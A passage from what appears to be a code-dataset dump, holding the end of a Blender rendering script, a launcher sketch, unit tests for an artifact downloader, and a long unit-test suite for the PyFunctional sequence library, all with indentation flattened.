raise RuntimeError('Must set --use_cycles=True to render out flow with ' +
'--render_metadata_exr')
print('Rendering frames')
render_util.render_animation(
args.frame_output_prefix, args.rendered_frames,
start_frame_offset=args.start_frame,
render_exr=args.render_metadata_exr,
skip_existing=args.skip_existing_frames)
except Exception as e:
tb = traceback.format_exc()
LOG.critical(tb)
LOG.critical('Script failed')
raise e
LOG.critical('Script completed')
| 2.03125 | 2 |
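Because the script only runs inside Blender, driving it from plain Python means shelling out to the blender binary with the flag layout documented in the header. A hedged launcher sketch follows; the paths and flag values are placeholders, but the flags themselves are the ones defined by the argparse setup above.

```python
# Hedged sketch of invoking render_main.py from outside Blender.
import subprocess

def render_blend(blend_path, output_prefix, frames=10, width=500, height=500):
    cmd = [
        "blender", "--background", "--factory-startup",
        "--python-exit-code", "1", blend_path,
        "--python", "blender/render_main.py", "--",
        "--use_cycles",
        "--width=%d" % width,
        "--height=%d" % height,
        "--rendered_frames=%d" % frames,
        "--frame_output_prefix=%s" % output_prefix,
    ]
    subprocess.run(cmd, check=True)

if __name__ == "__main__":
    render_blend("/path/to/scene.blend", "/tmp/out/frame")
```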
atlas/foundations_contrib/src/test/archiving/test_artifact_downloader.py | DeepLearnI/atlas | 296 | 11007 |
from foundations_spec import *
from unittest.mock import call
class TestArtifactDownloader(Spec):
mock_archiver = let_mock()
make_directory_mock = let_patch_mock('os.makedirs')
@let
def source_directory(self):
return self.faker.uri_path()
@let
def download_directory(self):
return self.faker.uri_path()
@let
def artifact_downloader(self):
from foundations_contrib.archiving.artifact_downloader import ArtifactDownloader
return ArtifactDownloader(self.mock_archiver)
@let
def mock_foundations_files(self):
return [
'foundations/a',
'foundations/b',
'foundations_contrib/c',
'foundations_contrib/d',
'foundations_events/e',
'foundations_events/f',
'foundations_internal/g',
'foundations_internal/h',
'jobs/i',
'jobs/j',
'model_serving/k',
'model_serving/l',
'venv/m',
'venv/n',
'docker_image_version.sh',
'download_gui_images.sh',
'foundations_gui.sh',
'foundations_package_manifest.yaml',
'foundations_requirements.txt',
'job.tgz',
'run.env',
'run.sh',
'p.bin',
'q.bin',
'template/t',
'template/u',
]
def test_downloads_single_file_to_specified_directory(self):
self._mock_file_list(['path/to/my/file'])
self.artifact_downloader.download_files('', self.download_directory)
self.mock_archiver.fetch_persisted_file.assert_called_with('path/to/my/file', self.download_directory + '/path/to/my/file')
def test_downloads_multiple_files_to_specified_directory(self):
self._mock_file_list(['different/file', 'other/different/file'])
self.artifact_downloader.download_files('', self.download_directory)
first_file_download = call('different/file', self.download_directory + '/different/file')
second_file_download = call('other/different/file', self.download_directory + '/other/different/file')
self.mock_archiver.fetch_persisted_file.assert_has_calls([first_file_download, second_file_download])
def test_ensures_target_directory_exists(self):
self._mock_file_list(['path/to/my/file'])
self.artifact_downloader.download_files('', self.download_directory)
self.make_directory_mock.assert_called_with(self.download_directory + '/path/to/my', exist_ok=True)
def test_creates_directories_for_multiple_files(self):
self._mock_file_list(['different/file', 'other/different/file'])
self.artifact_downloader.download_files('', self.download_directory)
first_directory_creation = call(self.download_directory + '/different', exist_ok=True)
second_directory_creation = call(self.download_directory + '/other/different', exist_ok=True)
self.make_directory_mock.assert_has_calls([first_directory_creation, second_directory_creation])
def test_downloads_only_files_with_specified_source_directory(self):
self._mock_file_list(['different/file', 'other/different/file'])
self.artifact_downloader.download_files('other/', self.download_directory)
self.mock_archiver.fetch_persisted_file.assert_called_once_with('other/different/file', self.download_directory + '/other/different/file')
def test_downloads_only_files_with_specified_source_directory_with_different_source_directory(self):
self._mock_file_list(['different/file', 'other/different/file'])
self.artifact_downloader.download_files('different/', self.download_directory)
self.mock_archiver.fetch_persisted_file.assert_called_once_with('different/file', self.download_directory + '/different/file')
def test_download_does_not_include_foundations_files(self):
for foundations_file in self.mock_foundations_files:
self._mock_file_list(['path/to/some/file', foundations_file])
self.artifact_downloader.download_files('', self.download_directory)
self.mock_archiver.fetch_persisted_file.assert_called_with('path/to/some/file', self.download_directory + '/path/to/some/file')
def test_download_includes_config_yamls(self):
for foundations_file in self.mock_foundations_files:
self._mock_file_list(['a.config.yaml', foundations_file])
self.artifact_downloader.download_files('', self.download_directory)
self.mock_archiver.fetch_persisted_file.assert_called_with('a.config.yaml', self.download_directory + '/a.config.yaml')
def _mock_file_list(self, file_list):
self.mock_archiver.fetch_miscellaneous = ConditionalReturn()
self.mock_archiver.fetch_miscellaneous.return_when(file_list, 'job_artifact_listing.pkl') | 2.328125 | 2 |
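The class under test is not shown in this row. Read from the tests, `download_files` lists the archived files, skips packaged framework files (but keeps `*.config.yaml`), filters by the requested source prefix, creates each target directory, and fetches the file. Below is a hedged sketch of that general shape; the real foundations_contrib implementation and its full ignore list differ in detail.

```python
# Hedged sketch inferred from the tests above; not the actual foundations code.
import os

def _is_framework_file(path):
    # Assumption: an abbreviated stand-in for the real packaged-file ignore list.
    if path.endswith('.config.yaml'):
        return False
    return path.startswith(('foundations', 'jobs/', 'venv/', 'model_serving/', 'template/'))

class ArtifactDownloader:
    def __init__(self, archiver):
        self._archiver = archiver

    def download_files(self, source_directory, download_directory):
        for path in self._archiver.fetch_miscellaneous('job_artifact_listing.pkl'):
            if _is_framework_file(path) or not path.startswith(source_directory):
                continue
            target = os.path.join(download_directory, path)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            self._archiver.fetch_persisted_file(path, target)
```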
lib/python3.5/functional/test/test_functional.py | mklan/NX-Rom-Market | 21 | 11008 | <filename>lib/python3.5/functional/test/test_functional.py
# pylint: skip-file
import unittest
import array
from collections import namedtuple
from itertools import product
from functional.pipeline import Sequence, is_iterable, _wrap, extend
from functional.transformations import name
from functional import seq, pseq
Data = namedtuple("Data", "x y")
def pandas_is_installed():
try:
global pandas
import pandas
return True
except ImportError:
return False
class TestPipeline(unittest.TestCase):
def setUp(self):
self.seq = seq
def assert_type(self, s):
self.assertTrue(isinstance(s, Sequence))
def assert_not_type(self, s):
self.assertFalse(isinstance(s, Sequence))
def assertIteratorEqual(self, iter_0, iter_1):
seq_0 = list(iter_0)
seq_1 = list(iter_1)
self.assertListEqual(seq_0, seq_1)
def test_is_iterable(self):
self.assertFalse(is_iterable([]))
self.assertTrue(is_iterable(iter([1, 2])))
def test_constructor(self):
self.assertRaises(TypeError, lambda: Sequence(1))
def test_base_sequence(self):
l = []
self.assert_type(self.seq(l))
self.assert_not_type(self.seq(l).sequence)
self.assert_type(self.seq(self.seq(l)))
self.assert_not_type(self.seq(self.seq(l)).sequence)
self.assert_not_type(self.seq(l)._base_sequence)
def test_eq(self):
l = [1, 2, 3]
self.assertIteratorEqual(self.seq(l).map(lambda x: x), self.seq(l))
def test_ne(self):
a = [1, 2, 3]
b = [1]
self.assertNotEqual(self.seq(a), self.seq(b))
def test_repr(self):
l = [1, 2, 3]
self.assertEqual(repr(l), repr(self.seq(l)))
def test_lineage_name(self):
f = lambda x: x
self.assertEqual(f.__name__, name(f))
f = "test"
self.assertEqual("test", name(f))
def test_str(self):
l = [1, 2, 3]
self.assertEqual(str(l), str(self.seq(l)))
def test_hash(self):
self.assertRaises(TypeError, lambda: hash(self.seq([1])))
def test_len(self):
l = [1, 2, 3]
s = self.seq(l)
self.assertEqual(len(l), s.size())
self.assertEqual(len(l), s.len())
def test_count(self):
l = self.seq([-1, -1, 1, 1, 1])
self.assertEqual(l.count(lambda x: x > 0), 3)
self.assertEqual(l.count(lambda x: x < 0), 2)
def test_getitem(self):
l = [1, 2, [3, 4, 5]]
s = self.seq(l).map(lambda x: x)
self.assertEqual(s[1], 2)
self.assertEqual(s[2], [3, 4, 5])
self.assert_type(s[2])
self.assertEqual(s[1:], [2, [3, 4, 5]])
self.assert_type(s[1:])
l = [{1, 2}, {2, 3}, {4, 5}]
s = self.seq(l)
self.assertIsInstance(s[0], set)
self.assertEqual(s[0], l[0])
def test_iter(self):
l = list(enumerate(self.seq([1, 2, 3])))
e = list(enumerate([1, 2, 3]))
self.assertEqual(l, e)
l = self.seq([1, 2, 3])
e = [1, 2, 3]
result = []
for n in l:
result.append(n)
self.assertEqual(result, e)
self.assert_type(l)
def test_contains(self):
string = "abcdef"
s = self.seq(iter(string)).map(lambda x: x)
self.assertTrue("c" in s)
def test_add(self):
l0 = self.seq([1, 2, 3]).map(lambda x: x)
l1 = self.seq([4, 5, 6])
l2 = [4, 5, 6]
expect = [1, 2, 3, 4, 5, 6]
self.assertEqual(l0 + l1, expect)
self.assertEqual(l0 + l2, expect)
def test_head(self):
l = self.seq([1, 2, 3]).map(lambda x: x)
self.assertEqual(l.head(), 1)
l = self.seq([[1, 2], 3, 4])
self.assertEqual(l.head(), [1, 2])
self.assert_type(l.head())
l = self.seq([])
with self.assertRaises(IndexError):
l.head()
def test_first(self):
l = self.seq([1, 2, 3]).map(lambda x: x)
self.assertEqual(l.first(), 1)
l = self.seq([[1, 2], 3, 4]).map(lambda x: x)
self.assertEqual(l.first(), [1, 2])
self.assert_type(l.first())
l = self.seq([])
with self.assertRaises(IndexError):
l.head()
def test_head_option(self):
l = self.seq([1, 2, 3]).map(lambda x: x)
self.assertEqual(l.head_option(), 1)
l = self.seq([[1, 2], 3, 4]).map(lambda x: x)
self.assertEqual(l.head_option(), [1, 2])
self.assert_type(l.head_option())
l = self.seq([])
self.assertIsNone(l.head_option())
def test_last(self):
l = self.seq([1, 2, 3]).map(lambda x: x)
self.assertEqual(l.last(), 3)
l = self.seq([1, 2, [3, 4]]).map(lambda x: x)
self.assertEqual(l.last(), [3, 4])
self.assert_type(l.last())
def test_last_option(self):
l = self.seq([1, 2, 3]).map(lambda x: x)
self.assertEqual(l.last_option(), 3)
l = self.seq([1, 2, [3, 4]]).map(lambda x: x)
self.assertEqual(l.last_option(), [3, 4])
self.assert_type(l.last_option())
l = self.seq([])
self.assertIsNone(l.last_option())
def test_init(self):
result = self.seq([1, 2, 3, 4]).map(lambda x: x).init()
expect = [1, 2, 3]
self.assertIteratorEqual(result, expect)
def test_tail(self):
l = self.seq([1, 2, 3, 4]).map(lambda x: x)
expect = [2, 3, 4]
self.assertIteratorEqual(l.tail(), expect)
def test_inits(self):
l = self.seq([1, 2, 3]).map(lambda x: x)
expect = [[1, 2, 3], [1, 2], [1], []]
self.assertIteratorEqual(l.inits(), expect)
self.assertIteratorEqual(l.inits().map(lambda s: s.sum()), [6, 3, 1, 0])
def test_tails(self):
l = self.seq([1, 2, 3]).map(lambda x: x)
expect = [[1, 2, 3], [2, 3], [3], []]
self.assertIteratorEqual(l.tails(), expect)
self.assertIteratorEqual(l.tails().map(lambda s: s.sum()), [6, 5, 3, 0])
def test_drop(self):
s = self.seq([1, 2, 3, 4, 5, 6])
expect = [5, 6]
result = s.drop(4)
self.assertIteratorEqual(result, expect)
self.assert_type(result)
self.assertIteratorEqual(s.drop(0), s)
self.assertIteratorEqual(s.drop(-1), s)
def test_drop_right(self):
s = self.seq([1, 2, 3, 4, 5]).map(lambda x: x)
expect = [1, 2, 3]
result = s.drop_right(2)
self.assert_type(result)
self.assertIteratorEqual(result, expect)
self.assertIteratorEqual(s.drop_right(0), s)
self.assertIteratorEqual(s.drop_right(-1), s)
def test_drop_while(self):
l = [1, 2, 3, 4, 5, 6, 7, 8]
f = lambda x: x < 4
expect = [4, 5, 6, 7, 8]
result = self.seq(l).drop_while(f)
self.assertIteratorEqual(expect, result)
self.assert_type(result)
def test_take(self):
s = self.seq([1, 2, 3, 4, 5, 6])
expect = [1, 2, 3, 4]
result = s.take(4)
self.assertIteratorEqual(result, expect)
self.assert_type(result)
self.assertIteratorEqual(s.take(0), self.seq([]))
self.assertIteratorEqual(s.take(-1), self.seq([]))
def test_take_while(self):
l = [1, 2, 3, 4, 5, 6, 7, 8]
f = lambda x: x < 4
expect = [1, 2, 3]
result = self.seq(l).take_while(f)
self.assertIteratorEqual(result, expect)
self.assert_type(result)
def test_union(self):
result = self.seq([1, 1, 2, 3, 3]).union([1, 4, 5])
expect = [1, 2, 3, 4, 5]
self.assert_type(result)
self.assertSetEqual(result.set(), set(expect))
def test_intersection(self):
result = self.seq([1, 2, 2, 3]).intersection([2, 3, 4, 5])
expect = [2, 3]
self.assert_type(result)
self.assertSetEqual(result.set(), set(expect))
def test_difference(self):
result = self.seq([1, 2, 3]).difference([2, 3, 4])
expect = [1]
self.assert_type(result)
self.assertSetEqual(result.set(), set(expect))
def test_symmetric_difference(self):
result = self.seq([1, 2, 3, 3]).symmetric_difference([2, 4, 5])
expect = [1, 3, 4, 5]
self.assert_type(result)
self.assertSetEqual(result.set(), set(expect))
def test_map(self):
f = lambda x: x * 2
l = [1, 2, 0, 5]
expect = [2, 4, 0, 10]
result = self.seq(l).map(f)
self.assertIteratorEqual(expect, result)
self.assert_type(result)
def test_select(self):
f = lambda x: x * 2
l = [1, 2, 0, 5]
expect = [2, 4, 0, 10]
result = self.seq(l).select(f)
self.assertIteratorEqual(expect, result)
self.assert_type(result)
def test_starmap(self):
f = lambda x, y: x * y
l = [(1, 1), (0, 3), (-3, 3), (4, 2)]
expect = [1, 0, -9, 8]
result = self.seq(l).starmap(f)
self.assertIteratorEqual(expect, result)
self.assert_type(result)
result = self.seq(l).smap(f)
self.assertIteratorEqual(expect, result)
self.assert_type(result)
def test_filter(self):
f = lambda x: x > 0
l = [0, -1, 5, 10]
expect = [5, 10]
s = self.seq(l)
result = s.filter(f)
self.assertIteratorEqual(expect, result)
self.assert_type(result)
def test_where(self):
f = lambda x: x > 0
l = [0, -1, 5, 10]
expect = [5, 10]
s = self.seq(l)
result = s.where(f)
self.assertIteratorEqual(expect, result)
self.assert_type(result)
def test_filter_not(self):
f = lambda x: x > 0
l = [0, -1, 5, 10]
expect = [0, -1]
result = self.seq(l).filter_not(f)
self.assertIteratorEqual(expect, result)
self.assert_type(result)
def test_map_filter(self):
f = lambda x: x > 0
g = lambda x: x * 2
l = [0, -1, 5]
s = self.seq(l)
expect = [10]
result = s.filter(f).map(g)
self.assertIteratorEqual(expect, result)
self.assert_type(result)
def test_reduce(self):
f = lambda x, y: x + y
l = ["a", "b", "c"]
expect = "abc"
s = self.seq(l)
self.assertEqual(expect, s.reduce(f))
with self.assertRaises(TypeError):
seq([]).reduce(f)
with self.assertRaises(ValueError):
seq([]).reduce(f, 0, 0)
self.assertEqual(seq([]).reduce(f, 1), 1)
self.assertEqual(seq([0, 2]).reduce(f, 1), 3)
def test_accumulate(self):
f = lambda x, y: x + y
l_char = ["a", "b", "c"]
expect_char = ["a", "ab", "abc"]
l_num = [1, 2, 3]
expect_num = [1, 3, 6]
self.assertEqual(seq(l_char).accumulate(), expect_char)
self.assertEqual(seq(l_num).accumulate(), expect_num)
def test_aggregate(self):
f = lambda current, next_element: current + next_element
l = self.seq([1, 2, 3, 4])
self.assertEqual(l.aggregate(f), 10)
self.assertEqual(l.aggregate(0, f), 10)
self.assertEqual(l.aggregate(0, f, lambda x: 2 * x), 20)
l = self.seq(["a", "b", "c"])
self.assertEqual(l.aggregate(f), "abc")
self.assertEqual(l.aggregate("", f), "abc")
self.assertEqual(l.aggregate("", f, lambda x: x.upper()), "ABC")
self.assertEqual(l.aggregate(f), "abc")
self.assertEqual(l.aggregate("z", f), "zabc")
self.assertEqual(l.aggregate("z", f, lambda x: x.upper()), "ZABC")
with self.assertRaises(ValueError):
l.aggregate()
with self.assertRaises(ValueError):
l.aggregate(None, None, None, None)
def test_fold_left(self):
f = lambda current, next_element: current + next_element
l = self.seq([1, 2, 3, 4])
self.assertEqual(l.fold_left(0, f), 10)
self.assertEqual(l.fold_left(-10, f), 0)
l = self.seq(["a", "b", "c"])
self.assertEqual(l.fold_left("", f), "abc")
self.assertEqual(l.fold_left("z", f), "zabc")
f = lambda x, y: x + [y]
self.assertEqual(l.fold_left([], f), ["a", "b", "c"])
self.assertEqual(l.fold_left(["start"], f), ["start", "a", "b", "c"])
def test_fold_right(self):
f = lambda next_element, current: current + next_element
l = self.seq([1, 2, 3, 4])
self.assertEqual(l.fold_right(0, f), 10)
self.assertEqual(l.fold_right(-10, f), 0)
l = self.seq(["a", "b", "c"])
self.assertEqual(l.fold_right("", f), "cba")
self.assertEqual(l.fold_right("z", f), "zcba")
f = lambda next_element, current: current + [next_element]
self.assertEqual(l.fold_right([], f), ["c", "b", "a"])
self.assertEqual(l.fold_right(["start"], f), ["start", "c", "b", "a"])
def test_sorted(self):
s = self.seq([1, 3, 2, 5, 4])
r = s.sorted()
self.assertIteratorEqual([1, 2, 3, 4, 5], r)
self.assert_type(r)
def test_order_by(self):
s = self.seq([(2, "a"), (1, "b"), (4, "c"), (3, "d")])
r = s.order_by(lambda x: x[0])
self.assertIteratorEqual([(1, "b"), (2, "a"), (3, "d"), (4, "c")], r)
self.assert_type(r)
def test_reverse(self):
l = [1, 2, 3]
expect = [4, 3, 2]
s = self.seq(l).map(lambda x: x + 1)
result = s.reverse()
self.assertIteratorEqual(expect, result)
self.assert_type(result)
result = s.__reversed__()
self.assertIteratorEqual(expect, result)
self.assert_type(result)
def test_distinct(self):
l = [1, 1, 2, 3, 2, 3]
expect = [1, 2, 3]
s = self.seq(l)
result = s.distinct()
for e in result:
self.assertTrue(e in expect)
result = s.distinct()
self.assertEqual(result.size(), len(expect))
self.assert_type(result)
def test_distinct_by(self):
s = self.seq(Data(1, 2), Data(1, 3), Data(2, 0), Data(3, -1), Data(1, 5))
expect = {Data(1, 2), Data(2, 0), Data(3, -1)}
result = s.distinct_by(lambda data: data.x)
self.assertSetEqual(set(result), expect)
self.assert_type(result)
def test_slice(self):
s = self.seq([1, 2, 3, 4])
result = s.slice(1, 2)
self.assertIteratorEqual(result, [2])
self.assert_type(result)
result = s.slice(1, 3)
self.assertIteratorEqual(result, [2, 3])
self.assert_type(result)
def test_any(self):
l = [True, False]
self.assertTrue(self.seq(l).any())
def test_all(self):
l = [True, False]
self.assertFalse(self.seq(l).all())
l = [True, True]
self.assertTrue(self.seq(l).all())
def test_enumerate(self):
l = [2, 3, 4]
e = [(0, 2), (1, 3), (2, 4)]
result = self.seq(l).enumerate()
self.assertIteratorEqual(result, e)
self.assert_type(result)
def test_inner_join(self):
l0 = [("a", 1), ("b", 2), ("c", 3)]
l1 = [("a", 2), ("c", 4), ("d", 5)]
result0 = self.seq(l0).inner_join(l1)
result1 = self.seq(l0).join(l1, "inner")
e = [("a", (1, 2)), ("c", (3, 4))]
self.assert_type(result0)
self.assert_type(result1)
self.assertDictEqual(dict(result0), dict(e))
self.assertDictEqual(dict(result1), dict(e))
result0 = self.seq(l0).inner_join(self.seq(l1))
result1 = self.seq(l0).join(self.seq(l1), "inner")
self.assert_type(result0)
self.assert_type(result1)
self.assertDictEqual(dict(result0), dict(e))
self.assertDictEqual(dict(result1), dict(e))
def test_left_join(self):
left = [("a", 1), ("b", 2)]
right = [("a", 2), ("c", 3)]
result0 = self.seq(left).left_join(right)
result1 = self.seq(left).join(right, "left")
expect = [("a", (1, 2)), ("b", (2, None))]
self.assert_type(result0)
self.assert_type(result1)
self.assertDictEqual(dict(result0), dict(expect))
self.assertDictEqual(dict(result1), dict(expect))
result0 = self.seq(left).left_join(self.seq(right))
result1 = self.seq(left).join(self.seq(right), "left")
self.assert_type(result0)
self.assert_type(result1)
self.assertDictEqual(dict(result0), dict(expect))
self.assertDictEqual(dict(result1), dict(expect))
def test_right_join(self):
left = [("a", 1), ("b", 2)]
right = [("a", 2), ("c", 3)]
result0 = self.seq(left).right_join(right)
result1 = self.seq(left).join(right, "right")
expect = [("a", (1, 2)), ("c", (None, 3))]
self.assert_type(result0)
self.assert_type(result1)
self.assertDictEqual(dict(result0), dict(expect))
self.assertDictEqual(dict(result1), dict(expect))
result0 = self.seq(left).right_join(self.seq(right))
result1 = self.seq(left).join(self.seq(right), "right")
self.assert_type(result0)
self.assert_type(result1)
self.assertDictEqual(dict(result0), dict(expect))
self.assertDictEqual(dict(result1), dict(expect))
def test_outer_join(self):
left = [("a", 1), ("b", 2)]
right = [("a", 2), ("c", 3)]
result0 = self.seq(left).outer_join(right)
result1 = self.seq(left).join(right, "outer")
expect = [("a", (1, 2)), ("b", (2, None)), ("c", (None, 3))]
self.assert_type(result0)
self.assert_type(result1)
self.assertDictEqual(dict(result0), dict(expect))
self.assertDictEqual(dict(result1), dict(expect))
result0 = self.seq(left).outer_join(self.seq(right))
result1 = self.seq(left).join(self.seq(right), "outer")
self.assert_type(result0)
self.assert_type(result1)
self.assertDictEqual(dict(result0), dict(expect))
self.assertDictEqual(dict(result1), dict(expect))
def test_join(self):
with self.assertRaises(TypeError):
self.seq([(1, 2)]).join([(2, 3)], "").to_list()
def test_max(self):
l = [1, 2, 3]
self.assertEqual(3, self.seq(l).max())
def test_min(self):
l = [1, 2, 3]
self.assertEqual(1, self.seq(l).min())
def test_max_by(self):
l = ["aa", "bbbb", "c", "dd"]
self.assertEqual("bbbb", self.seq(l).max_by(len))
def test_min_by(self):
l = ["aa", "bbbb", "c", "dd"]
self.assertEqual("c", self.seq(l).min_by(len))
def test_find(self):
l = [1, 2, 3]
f = lambda x: x == 3
g = lambda x: False
self.assertEqual(3, self.seq(l).find(f))
self.assertIsNone(self.seq(l).find(g))
def test_flatten(self):
l = [[1, 1, 1], [2, 2, 2], [[3, 3], [4, 4]]]
expect = [1, 1, 1, 2, 2, 2, [3, 3], [4, 4]]
result = self.seq(l).flatten()
self.assertIteratorEqual(expect, result)
self.assert_type(result)
def test_flat_map(self):
l = [[1, 1, 1], [2, 2, 2], [3, 3, 3]]
f = lambda x: x
expect = [1, 1, 1, 2, 2, 2, 3, 3, 3]
result = self.seq(l).flat_map(f)
self.assertIteratorEqual(expect, result)
self.assert_type(result)
def test_group_by(self):
l = [(1, 1), (1, 2), (1, 3), (2, 2)]
f = lambda x: x[0]
expect = {1: [(1, 1), (1, 2), (1, 3)], 2: [(2, 2)]}
result = self.seq(l).group_by(f)
result_comparison = {}
for kv in result:
result_comparison[kv[0]] = kv[1]
self.assertIteratorEqual(expect, result_comparison)
self.assert_type(result)
def test_group_by_key(self):
l = [("a", 1), ("a", 2), ("a", 3), ("b", -1), ("b", 1), ("c", 10), ("c", 5)]
e = {"a": [1, 2, 3], "b": [-1, 1], "c": [10, 5]}.items()
result = self.seq(l).group_by_key()
self.assertEqual(result.len(), len(e))
for e0, e1 in zip(result, e):
self.assertIteratorEqual(e0, e1)
self.assert_type(result)
def test_grouped(self):
l = self.seq([1, 2, 3, 4, 5, 6, 7, 8])
expect = [[1, 2], [3, 4], [5, 6], [7, 8]]
self.assertIteratorEqual(map(list, l.grouped(2)), expect)
expect = [[1, 2, 3], [4, 5, 6], [7, 8]]
self.assertIteratorEqual(map(list, l.grouped(3)), expect)
def test_grouped_returns_list(self):
l = self.seq([1, 2, 3, 4, 5, 6, 7, 8])
self.assertTrue(is_iterable(l.grouped(2)))
self.assertTrue(is_iterable(l.grouped(3)))
def test_sliding(self):
l = self.seq([1, 2, 3, 4, 5, 6, 7])
expect = [[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [6, 7]]
self.assertIteratorEqual(l.sliding(2), expect)
l = self.seq([1, 2, 3])
expect = [[1, 2], [3]]
self.assertIteratorEqual(l.sliding(2, 2), expect)
expect = [[1, 2]]
self.assertIteratorEqual(l.sliding(2, 3), expect)
def test_empty(self):
self.assertTrue(self.seq([]).empty())
def test_non_empty(self):
self.assertTrue(self.seq([1]).non_empty())
def test_non_zero_bool(self):
self.assertTrue(bool(self.seq([1])))
self.assertFalse(bool(self.seq([])))
def test_make_string(self):
l = [1, 2, 3]
expect1 = "123"
expect2 = "1:2:3"
s = self.seq(l)
self.assertEqual(expect1, s.make_string(""))
self.assertEqual(expect2, s.make_string(":"))
s = self.seq([])
self.assertEqual("", s.make_string(""))
self.assertEqual("", s.make_string(":"))
def test_partition(self):
l = [-1, -2, -3, 1, 2, 3]
e2 = [-1, -2, -3]
e1 = [1, 2, 3]
f = lambda x: x > 0
s = self.seq(l)
p1, p2 = s.partition(f)
self.assertIteratorEqual(e1, list(p1))
self.assertIteratorEqual(e2, list(p2))
self.assert_type(p1)
self.assert_type(p2)
result = self.seq([[1, 2, 3], [4, 5, 6]]).flatten().partition(lambda x: x > 2)
expect = [[3, 4, 5, 6], [1, 2]]
self.assertIteratorEqual(expect, list(result))
self.assert_type(result)
def test_cartesian(self):
result = seq.range(3).cartesian(range(3)).list()
self.assertListEqual(result, list(product(range(3), range(3))))
result = seq.range(3).cartesian(range(3), range(2)).list()
self.assertListEqual(result, list(product(range(3), range(3), range(2))))
result = seq.range(3).cartesian(range(3), range(2), repeat=2).list()
self.assertListEqual(
result, list(product(range(3), range(3), range(2), repeat=2))
)
def test_product(self):
l = [2, 2, 3]
self.assertEqual(12, self.seq(l).product())
self.assertEqual(96, self.seq(l).product(lambda x: x * 2))
s = self.seq([])
self.assertEqual(1, s.product())
self.assertEqual(2, s.product(lambda x: x * 2))
s = self.seq([5])
self.assertEqual(5, s.product())
self.assertEqual(10, s.product(lambda x: x * 2))
def test_sum(self):
l = [1, 2, 3]
self.assertEqual(6, self.seq(l).sum())
self.assertEqual(12, self.seq(l).sum(lambda x: x * 2))
def test_average(self):
l = [1, 2]
self.assertEqual(1.5, self.seq(l).average())
self.assertEqual(4.5, self.seq(l).average(lambda x: x * 3))
def test_set(self):
l = [1, 1, 2, 2, 3]
ls = set(l)
self.assertIteratorEqual(ls, self.seq(l).set())
def test_zip(self):
l1 = [1, 2, 3]
l2 = [-1, -2, -3]
e = [(1, -1), (2, -2), (3, -3)]
result = self.seq(l1).zip(l2)
self.assertIteratorEqual(e, result)
self.assert_type(result)
def test_zip_with_index(self):
l = [2, 3, 4]
e = [(2, 0), (3, 1), (4, 2)]
result = self.seq(l).zip_with_index()
self.assertIteratorEqual(result, e)
self.assert_type(result)
e = [(2, 5), (3, 6), (4, 7)]
result = self.seq(l).zip_with_index(5)
self.assertIteratorEqual(result, e)
self.assert_type(result)
def test_to_list(self):
l = [1, 2, 3, "abc", {1: 2}, {1, 2, 3}]
result = self.seq(l).to_list()
self.assertIteratorEqual(result, l)
self.assertTrue(isinstance(result, list))
result = self.seq(iter([0, 1, 2])).to_list()
self.assertIsInstance(result, list)
result = self.seq(l).list(n=2)
self.assertEqual(result, [1, 2])
def test_list(self):
l = [1, 2, 3, "abc", {1: 2}, {1, 2, 3}]
result = self.seq(l).list()
self.assertEqual(result, l)
self.assertTrue(isinstance(result, list))
result = self.seq(iter([0, 1, 2])).to_list()
self.assertIsInstance(result, list)
result = self.seq(l).list(n=2)
self.assertEqual(result, [1, 2])
def test_for_each(self):
l = [1, 2, 3, "abc", {1: 2}, {1, 2, 3}]
result = []
def f(e):
result.append(e)
self.seq(l).for_each(f)
self.assertEqual(result, l)
def test_exists(self):
l = ["aaa", "BBB", "ccc"]
self.assertTrue(self.seq(l).exists(str.islower))
self.assertTrue(self.seq(l).exists(str.isupper))
self.assertFalse(self.seq(l).exists(lambda s: "d" in s))
def test_for_all(self):
l = ["aaa", "bbb", "ccc"]
self.assertTrue(self.seq(l).for_all(str.islower))
self.assertFalse(self.seq(l).for_all(str.isupper))
def test_to_dict(self):
l = [(1, 2), (2, 10), (7, 2)]
d = {1: 2, 2: 10, 7: 2}
result = self.seq(l).to_dict()
self.assertDictEqual(result, d)
self.assertTrue(isinstance(result, dict))
result = self.seq(l).to_dict(default=lambda: 100)
self.assertTrue(1 in result)
self.assertFalse(3 in result)
self.assertEqual(result[4], 100)
result = self.seq(l).dict(default=100)
self.assertTrue(1 in result)
self.assertFalse(3 in result)
self.assertEqual(result[4], 100)
def test_dict(self):
l = [(1, 2), (2, 10), (7, 2)]
d = {1: 2, 2: 10, 7: 2}
result = self.seq(l).dict()
self.assertDictEqual(result, d)
self.assertTrue(isinstance(result, dict))
result = self.seq(l).dict(default=lambda: 100)
self.assertTrue(1 in result)
self.assertFalse(3 in result)
self.assertEqual(result[4], 100)
result = self.seq(l).dict(default=100)
self.assertTrue(1 in result)
self.assertFalse(3 in result)
self.assertEqual(result[4], 100)
def test_reduce_by_key(self):
l = [("a", 1), ("a", 2), ("a", 3), ("b", -1), ("b", 1), ("c", 10), ("c", 5)]
e = {"a": 6, "b": 0, "c": 15}.items()
result = self.seq(l).reduce_by_key(lambda x, y: x + y)
self.assertEqual(result.len(), len(e))
for e0, e1 in zip(result, e):
self.assertEqual(e0, e1)
self.assert_type(result)
def test_count_by_key(self):
l = [
("a", 1),
("a", 2),
("a", 3),
("b", -1),
("b", 1),
("c", 10),
("c", 5),
("d", 1),
]
e = {"a": 3, "b": 2, "c": 2, "d": 1}.items()
result = self.seq(l).count_by_key()
self.assertEqual(result.len(), len(e))
for e0, e1 in zip(result, e):
self.assertEqual(e0, e1)
self.assert_type(result)
def test_count_by_value(self):
l = ["a", "a", "a", "b", "b", "c", "d"]
e = {"a": 3, "b": 2, "c": 1, "d": 1}.items()
result = self.seq(l).count_by_value()
self.assertEqual(result.len(), len(e))
for e0, e1 in zip(result, e):
self.assertEqual(e0, e1)
self.assert_type(result)
def test_wrap(self):
self.assert_type(_wrap([1, 2]))
self.assert_type(_wrap((1, 2)))
self.assert_not_type(_wrap(1))
self.assert_not_type(_wrap(1.0))
self.assert_not_type(_wrap("test"))
self.assert_not_type(_wrap(True))
self.assert_not_type(_wrap(Data(1, 2)))
def test_wrap_objects(self):
class A(object):
a = 1
l = [A(), A(), A()]
self.assertIsInstance(_wrap(A()), A)
self.assert_type(self.seq(l))
@unittest.skipUnless(
pandas_is_installed(), "Skip pandas tests if pandas is not installed"
)
def test_wrap_pandas(self):
df1 = pandas.DataFrame({"name": ["name1", "name2"], "value": [1, 2]})
df2 = pandas.DataFrame({"name": ["name1", "name2"], "value": [3, 4]})
result = seq([df1, df2]).reduce(lambda x, y: x.append(y))
self.assertEqual(result.len(), 4)
